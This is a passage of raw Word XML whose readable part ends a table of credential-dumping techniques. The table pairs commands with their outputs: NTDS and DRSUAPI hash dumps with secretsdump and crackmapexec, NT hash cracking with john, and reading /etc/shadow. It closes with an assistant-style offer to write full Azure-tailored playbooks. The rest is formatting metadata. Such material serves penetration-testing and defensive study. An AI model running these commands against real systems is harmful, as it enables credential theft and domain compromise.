              <w:t xml:space="preserve"> &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00987D73">
              <w:t>ntds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00987D73">
              <w:t>&gt; -system &lt;system&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25A53862" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Attacker machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E70BF33" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>NTLM hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00995D7A" w:rsidRPr="00987D73" w14:paraId="7FAED5B1" w14:textId="77777777" w:rsidTr="003955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81F390" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Remote hash dump (SMB)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4769BE25" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>auxiliary/scanner/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00987D73">
              <w:t>smb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00987D73">
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00987D73">
              <w:t>impacket</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00987D73">
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00987D73">
              <w:t>secretsdump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EB05B52" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Windows VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EAC3661" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>NTLM hashes over network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00995D7A" w:rsidRPr="00987D73" w14:paraId="190C0BF0" w14:textId="77777777" w:rsidTr="003955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48D8D1" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Remote hash dump (DRSUAPI)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12B2AAF6" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00987D73">
              <w:t>crackmapexec</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00987D73">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00987D73">
              <w:t>smb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00987D73">
              <w:t xml:space="preserve"> &lt;IP&gt; -u &lt;user&gt; -p &lt;pass&gt; --</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00987D73">
              <w:t>ntds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00987D73">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00987D73">
              <w:t>drsuapi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B555B88" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Windows VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44A56B24" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Domain hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00995D7A" w:rsidRPr="00987D73" w14:paraId="02B0CBC8" w14:textId="77777777" w:rsidTr="003955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32B114" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Hash cracking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79C043A0" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>john --format=NT &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00987D73">
              <w:t>hashfile</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00987D73">
              <w:t>&gt; --show</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FEF3899" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Attacker machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="775B3FF0" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Plaintext passwords</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00995D7A" w:rsidRPr="00987D73" w14:paraId="27FB9943" w14:textId="77777777" w:rsidTr="003955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867938" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Local Linux hash dumping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68E530B6" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>sudo cat /etc/shadow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B8A9F04" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Linux VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="500341AE" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Local user password hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A336C23" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r>
        <w:pict w14:anchorId="05D56E4A">
          <v:rect id="_x0000_i1059" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C881E3" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r w:rsidRPr="00987D73">
        <w:t>If you'd like, I can provide full scripts or an automated playbook for these steps with commands tailored for Azure environments. Would that help?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242BAF05" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRDefault="00995D7A" w:rsidP="00995D7A"/>
    <w:p w14:paraId="3AE60638" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRDefault="00995D7A" w:rsidP="00995D7A"/>
    <w:p w14:paraId="61845FB9" w14:textId="77777777" w:rsidR="00F41B33" w:rsidRDefault="00F41B33"/>
    <w:sectPr w:rsidR="00F41B33" w:rsidSect="00D57BC5">
      <w:pgSz w:w="12240" w:h="15840" w:code="1"/>
      <w:pgMar w:top="720" w:right="720" w:bottom="720" w:left="720" w:header="482" w:footer="482" w:gutter="0"/>
      <w:cols w:space="708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F35414"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ACC22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E925C0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BEA67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886547"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1D6CF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7E01E3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="36B2B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4F2B28"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BBFC6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454D7F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7E2E1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7E7D05"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EFD2D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6058D3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C8120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937BDE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8E0A9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CBD7DB3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="15A6E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5012182"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3E7C96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5857A50"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="36A6F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64361FD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FF505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FBB3424"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EC30B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06C0BB8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ACDAD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1504377"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DE248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6122CA0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="72FA5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B970B69"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E8DCE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E8D0E9A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="93861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6D53F91"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DDAA5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769793A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FC04B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0152629"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="766A4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3BB1DB4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="63E6E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C4C3010"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="41CCB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D3C437F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2CCA9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65909122">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2102754463">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1081489420">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="443883082">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1160537188">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="392437497">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="2080059929">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="205145640">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1976640768">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="425811046">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="164589285">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="926303324">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="894777886">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="121729028">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="448546394">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1006593111">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1596133480">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1004087392">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="834609766">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1995447182">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1963148596">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1163087218">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="820658352">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1857235638">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="152328357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20"/>
  <w:drawingGridVerticalSpacing w:val="163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5D7A"/>
    <w:rsid w:val="000017B5"/>
    <w:rsid w:val="0002203E"/>
    <w:rsid w:val="00033139"/>
    <w:rsid w:val="000439E4"/>
    <w:rsid w:val="0004748A"/>
    <w:rsid w:val="0006299B"/>
    <w:rsid w:val="00066ABF"/>
    <w:rsid w:val="00072945"/>
    <w:rsid w:val="00076E93"/>
    <w:rsid w:val="00077189"/>
    <w:rsid w:val="000918CB"/>
    <w:rsid w:val="0009312D"/>
    <w:rsid w:val="000A5158"/>
    <w:rsid w:val="000B7F32"/>
    <w:rsid w:val="000C388F"/>
    <w:rsid w:val="000C60D5"/>
    <w:rsid w:val="000D6154"/>
    <w:rsid w:val="000D740B"/>
    <w:rsid w:val="000F524D"/>
    <w:rsid w:val="001006C6"/>
    <w:rsid w:val="00102773"/>
    <w:rsid w:val="00102E91"/>
    <w:rsid w:val="00107676"/>
    <w:rsid w:val="00113072"/>
    <w:rsid w:val="00114A6E"/>
    <w:rsid w:val="001322ED"/>
    <w:rsid w:val="001336DC"/>
    <w:rsid w:val="00135E9B"/>
    <w:rsid w:val="0014690C"/>
    <w:rsid w:val="00177948"/>
    <w:rsid w:val="00177CFB"/>
    <w:rsid w:val="00181AD7"/>
    <w:rsid w:val="00184D18"/>
    <w:rsid w:val="00187466"/>
    <w:rsid w:val="001924F6"/>
    <w:rsid w:val="0019345C"/>
    <w:rsid w:val="001A4621"/>
    <w:rsid w:val="001A5AAA"/>
    <w:rsid w:val="001A74BD"/>
    <w:rsid w:val="001C644C"/>
    <w:rsid w:val="001C68E0"/>
    <w:rsid w:val="001D1A64"/>
    <w:rsid w:val="001D58A2"/>
    <w:rsid w:val="001D66CF"/>
    <w:rsid w:val="001E2E6C"/>
    <w:rsid w:val="001E301C"/>
    <w:rsid w:val="001E5594"/>
    <w:rsid w:val="001F5D83"/>
    <w:rsid w:val="001F65C3"/>
    <w:rsid w:val="002060F8"/>
    <w:rsid w:val="002116F5"/>
    <w:rsid w:val="0021300D"/>
    <w:rsid w:val="00224E8A"/>
    <w:rsid w:val="00227491"/>
    <w:rsid w:val="00232E9A"/>
    <w:rsid w:val="0023661A"/>
    <w:rsid w:val="00251308"/>
    <w:rsid w:val="002542AC"/>
    <w:rsid w:val="00260FC6"/>
    <w:rsid w:val="00264C27"/>
    <w:rsid w:val="00266F2F"/>
    <w:rsid w:val="0027337F"/>
    <w:rsid w:val="00273FEB"/>
    <w:rsid w:val="002743C1"/>
    <w:rsid w:val="00274649"/>
    <w:rsid w:val="00275376"/>
    <w:rsid w:val="00280326"/>
    <w:rsid w:val="00280D0C"/>
    <w:rsid w:val="002812E1"/>
    <w:rsid w:val="00281F8E"/>
    <w:rsid w:val="002A0FEA"/>
    <w:rsid w:val="002A396C"/>
    <w:rsid w:val="002A3C19"/>
    <w:rsid w:val="002B6484"/>
    <w:rsid w:val="002B71D3"/>
    <w:rsid w:val="002D475E"/>
    <w:rsid w:val="002F4483"/>
    <w:rsid w:val="003020A1"/>
    <w:rsid w:val="003040E7"/>
    <w:rsid w:val="00304F03"/>
    <w:rsid w:val="00306A06"/>
    <w:rsid w:val="00306A18"/>
    <w:rsid w:val="003166E6"/>
    <w:rsid w:val="003242AE"/>
    <w:rsid w:val="00335DB6"/>
    <w:rsid w:val="00345ECC"/>
    <w:rsid w:val="0035232E"/>
    <w:rsid w:val="00352726"/>
    <w:rsid w:val="00352F0B"/>
    <w:rsid w:val="003552B4"/>
    <w:rsid w:val="00360905"/>
    <w:rsid w:val="00374B3B"/>
    <w:rsid w:val="0038065E"/>
    <w:rsid w:val="00395C47"/>
    <w:rsid w:val="0039626B"/>
    <w:rsid w:val="00397068"/>
    <w:rsid w:val="003A652B"/>
    <w:rsid w:val="003A6CF3"/>
    <w:rsid w:val="003B3F5B"/>
    <w:rsid w:val="003C1B9A"/>
    <w:rsid w:val="003C28F8"/>
    <w:rsid w:val="003D0A5E"/>
    <w:rsid w:val="003D684E"/>
    <w:rsid w:val="003E35F3"/>
    <w:rsid w:val="003E47BC"/>
    <w:rsid w:val="003F4588"/>
    <w:rsid w:val="003F57CC"/>
    <w:rsid w:val="003F5E14"/>
    <w:rsid w:val="004015FF"/>
    <w:rsid w:val="00402258"/>
    <w:rsid w:val="00403F88"/>
    <w:rsid w:val="00413068"/>
    <w:rsid w:val="00416382"/>
    <w:rsid w:val="00424475"/>
    <w:rsid w:val="004324EE"/>
    <w:rsid w:val="004421AF"/>
    <w:rsid w:val="00446563"/>
    <w:rsid w:val="00453E91"/>
    <w:rsid w:val="004577F4"/>
    <w:rsid w:val="0046272A"/>
    <w:rsid w:val="00467BB1"/>
    <w:rsid w:val="00467CE3"/>
    <w:rsid w:val="004751E9"/>
    <w:rsid w:val="004A186E"/>
    <w:rsid w:val="004B3933"/>
    <w:rsid w:val="004B6BA7"/>
    <w:rsid w:val="004B6C74"/>
    <w:rsid w:val="004C4322"/>
    <w:rsid w:val="004C7D0F"/>
    <w:rsid w:val="004E1315"/>
    <w:rsid w:val="004F4E03"/>
    <w:rsid w:val="0050563B"/>
    <w:rsid w:val="0051626A"/>
    <w:rsid w:val="005245D1"/>
    <w:rsid w:val="0053490A"/>
    <w:rsid w:val="00553BC6"/>
    <w:rsid w:val="00554715"/>
    <w:rsid w:val="00556196"/>
    <w:rsid w:val="00557F08"/>
    <w:rsid w:val="005603E5"/>
    <w:rsid w:val="00583ED4"/>
    <w:rsid w:val="00592652"/>
    <w:rsid w:val="0059791E"/>
    <w:rsid w:val="005B2210"/>
    <w:rsid w:val="005D69EC"/>
    <w:rsid w:val="005F0233"/>
    <w:rsid w:val="005F4353"/>
    <w:rsid w:val="00601FA0"/>
    <w:rsid w:val="00606AEB"/>
    <w:rsid w:val="006071B0"/>
    <w:rsid w:val="00613437"/>
    <w:rsid w:val="00622C2A"/>
    <w:rsid w:val="0063112D"/>
    <w:rsid w:val="006314E3"/>
    <w:rsid w:val="006323EA"/>
    <w:rsid w:val="00632853"/>
    <w:rsid w:val="0063537A"/>
    <w:rsid w:val="006473A7"/>
    <w:rsid w:val="0065749E"/>
    <w:rsid w:val="00660232"/>
    <w:rsid w:val="00660C9F"/>
    <w:rsid w:val="006625F0"/>
    <w:rsid w:val="00670919"/>
    <w:rsid w:val="00671E03"/>
    <w:rsid w:val="006723B0"/>
    <w:rsid w:val="00676C2D"/>
    <w:rsid w:val="00684EB2"/>
    <w:rsid w:val="00686BFA"/>
    <w:rsid w:val="00691E2B"/>
    <w:rsid w:val="006930CC"/>
    <w:rsid w:val="00694B26"/>
    <w:rsid w:val="006C3B36"/>
    <w:rsid w:val="006D69ED"/>
    <w:rsid w:val="006E2E8B"/>
    <w:rsid w:val="006E6F0F"/>
    <w:rsid w:val="006F1166"/>
    <w:rsid w:val="006F19D2"/>
    <w:rsid w:val="00704B98"/>
    <w:rsid w:val="0071184D"/>
    <w:rsid w:val="00715274"/>
    <w:rsid w:val="007265BA"/>
    <w:rsid w:val="00736D83"/>
    <w:rsid w:val="0076501B"/>
    <w:rsid w:val="007677EE"/>
    <w:rsid w:val="0077641C"/>
    <w:rsid w:val="007A0F80"/>
    <w:rsid w:val="007A4103"/>
    <w:rsid w:val="007A41D0"/>
    <w:rsid w:val="007A65BF"/>
    <w:rsid w:val="007B2846"/>
    <w:rsid w:val="007B5889"/>
    <w:rsid w:val="007C524D"/>
    <w:rsid w:val="007E2276"/>
    <w:rsid w:val="007F760C"/>
    <w:rsid w:val="00800A6F"/>
    <w:rsid w:val="00806D80"/>
    <w:rsid w:val="00811606"/>
    <w:rsid w:val="00843787"/>
    <w:rsid w:val="00847B3B"/>
    <w:rsid w:val="0085471B"/>
    <w:rsid w:val="008563E4"/>
    <w:rsid w:val="00862752"/>
    <w:rsid w:val="00880F8A"/>
    <w:rsid w:val="00887C14"/>
    <w:rsid w:val="00896B77"/>
    <w:rsid w:val="008A5D6A"/>
    <w:rsid w:val="008A6657"/>
    <w:rsid w:val="008A6ACE"/>
    <w:rsid w:val="008C07C7"/>
    <w:rsid w:val="008F3EDA"/>
    <w:rsid w:val="009040DB"/>
    <w:rsid w:val="00913B1A"/>
    <w:rsid w:val="009429BD"/>
    <w:rsid w:val="00943D84"/>
    <w:rsid w:val="00944CE7"/>
    <w:rsid w:val="00950AB3"/>
    <w:rsid w:val="00956469"/>
    <w:rsid w:val="009573E0"/>
    <w:rsid w:val="009644E3"/>
    <w:rsid w:val="00987A9E"/>
    <w:rsid w:val="0099026D"/>
    <w:rsid w:val="00995D7A"/>
    <w:rsid w:val="009B31A7"/>
    <w:rsid w:val="009B721A"/>
    <w:rsid w:val="009C309A"/>
    <w:rsid w:val="009C3755"/>
    <w:rsid w:val="009C4EBF"/>
    <w:rsid w:val="009C5D29"/>
    <w:rsid w:val="009D06C9"/>
    <w:rsid w:val="009D3E78"/>
    <w:rsid w:val="009D6956"/>
    <w:rsid w:val="009F1991"/>
    <w:rsid w:val="009F67FD"/>
    <w:rsid w:val="00A07D5B"/>
    <w:rsid w:val="00A1237B"/>
    <w:rsid w:val="00A2058C"/>
    <w:rsid w:val="00A20953"/>
    <w:rsid w:val="00A32323"/>
    <w:rsid w:val="00A407C4"/>
    <w:rsid w:val="00A50AE2"/>
    <w:rsid w:val="00A5157C"/>
    <w:rsid w:val="00A67CE2"/>
    <w:rsid w:val="00A878A6"/>
    <w:rsid w:val="00A90A9E"/>
    <w:rsid w:val="00A9797E"/>
    <w:rsid w:val="00AA4905"/>
    <w:rsid w:val="00AA6275"/>
    <w:rsid w:val="00AB044C"/>
    <w:rsid w:val="00AB1927"/>
    <w:rsid w:val="00AB56F9"/>
    <w:rsid w:val="00AB5722"/>
    <w:rsid w:val="00AB63BE"/>
    <w:rsid w:val="00AB75B3"/>
    <w:rsid w:val="00AC2559"/>
    <w:rsid w:val="00AC37D7"/>
    <w:rsid w:val="00AD28BD"/>
    <w:rsid w:val="00AD4A62"/>
    <w:rsid w:val="00AD4DF8"/>
    <w:rsid w:val="00AE563C"/>
    <w:rsid w:val="00AE6D6F"/>
    <w:rsid w:val="00AE772A"/>
    <w:rsid w:val="00AF41E5"/>
    <w:rsid w:val="00AF6BFF"/>
    <w:rsid w:val="00B02CEC"/>
    <w:rsid w:val="00B06F1D"/>
    <w:rsid w:val="00B1061D"/>
    <w:rsid w:val="00B223EB"/>
    <w:rsid w:val="00B315BA"/>
    <w:rsid w:val="00B33755"/>
    <w:rsid w:val="00B64108"/>
    <w:rsid w:val="00B728CC"/>
    <w:rsid w:val="00B83C6E"/>
    <w:rsid w:val="00B84485"/>
    <w:rsid w:val="00B87D76"/>
    <w:rsid w:val="00BA3DE7"/>
    <w:rsid w:val="00BB5315"/>
    <w:rsid w:val="00BC52F7"/>
    <w:rsid w:val="00BC75C0"/>
    <w:rsid w:val="00BD0AE3"/>
    <w:rsid w:val="00BD414E"/>
    <w:rsid w:val="00BE6F69"/>
    <w:rsid w:val="00BF7022"/>
    <w:rsid w:val="00C015CB"/>
    <w:rsid w:val="00C048BE"/>
    <w:rsid w:val="00C14DF8"/>
    <w:rsid w:val="00C314BE"/>
    <w:rsid w:val="00C341D9"/>
    <w:rsid w:val="00C360E1"/>
    <w:rsid w:val="00C52C79"/>
    <w:rsid w:val="00C55DAC"/>
    <w:rsid w:val="00C56857"/>
    <w:rsid w:val="00C62519"/>
    <w:rsid w:val="00C6540C"/>
    <w:rsid w:val="00C71955"/>
    <w:rsid w:val="00C73F6E"/>
    <w:rsid w:val="00C7606A"/>
    <w:rsid w:val="00C770D6"/>
    <w:rsid w:val="00C777A0"/>
    <w:rsid w:val="00C83252"/>
    <w:rsid w:val="00C917B2"/>
    <w:rsid w:val="00C93774"/>
    <w:rsid w:val="00CA3A57"/>
    <w:rsid w:val="00CC17F1"/>
    <w:rsid w:val="00CC25D2"/>
    <w:rsid w:val="00CC413D"/>
    <w:rsid w:val="00CC4BAD"/>
    <w:rsid w:val="00CC5EDB"/>
    <w:rsid w:val="00CD538E"/>
    <w:rsid w:val="00CD6CF1"/>
    <w:rsid w:val="00CD6CF3"/>
    <w:rsid w:val="00CE2905"/>
    <w:rsid w:val="00CF4E30"/>
    <w:rsid w:val="00CF5FB0"/>
    <w:rsid w:val="00D02320"/>
    <w:rsid w:val="00D03CCD"/>
    <w:rsid w:val="00D04CAE"/>
    <w:rsid w:val="00D052DD"/>
    <w:rsid w:val="00D173C7"/>
    <w:rsid w:val="00D22C33"/>
    <w:rsid w:val="00D42CD4"/>
    <w:rsid w:val="00D44068"/>
    <w:rsid w:val="00D5105A"/>
    <w:rsid w:val="00D539ED"/>
    <w:rsid w:val="00D57BC5"/>
    <w:rsid w:val="00D57FB8"/>
    <w:rsid w:val="00D763E2"/>
    <w:rsid w:val="00D77453"/>
    <w:rsid w:val="00D8256E"/>
    <w:rsid w:val="00D969CE"/>
    <w:rsid w:val="00DA5219"/>
    <w:rsid w:val="00DB37E4"/>
    <w:rsid w:val="00DC4F7D"/>
    <w:rsid w:val="00DF5E46"/>
    <w:rsid w:val="00E0646E"/>
    <w:rsid w:val="00E06CCA"/>
    <w:rsid w:val="00E12274"/>
    <w:rsid w:val="00E123B3"/>
    <w:rsid w:val="00E15D45"/>
    <w:rsid w:val="00E215F9"/>
    <w:rsid w:val="00E226A6"/>
    <w:rsid w:val="00E27584"/>
    <w:rsid w:val="00E363FE"/>
    <w:rsid w:val="00E42995"/>
    <w:rsid w:val="00E51366"/>
    <w:rsid w:val="00E52526"/>
    <w:rsid w:val="00E60B60"/>
    <w:rsid w:val="00E625A2"/>
    <w:rsid w:val="00E711CA"/>
    <w:rsid w:val="00E76566"/>
    <w:rsid w:val="00E8068F"/>
    <w:rsid w:val="00E82BDE"/>
    <w:rsid w:val="00E8732D"/>
    <w:rsid w:val="00E94E2C"/>
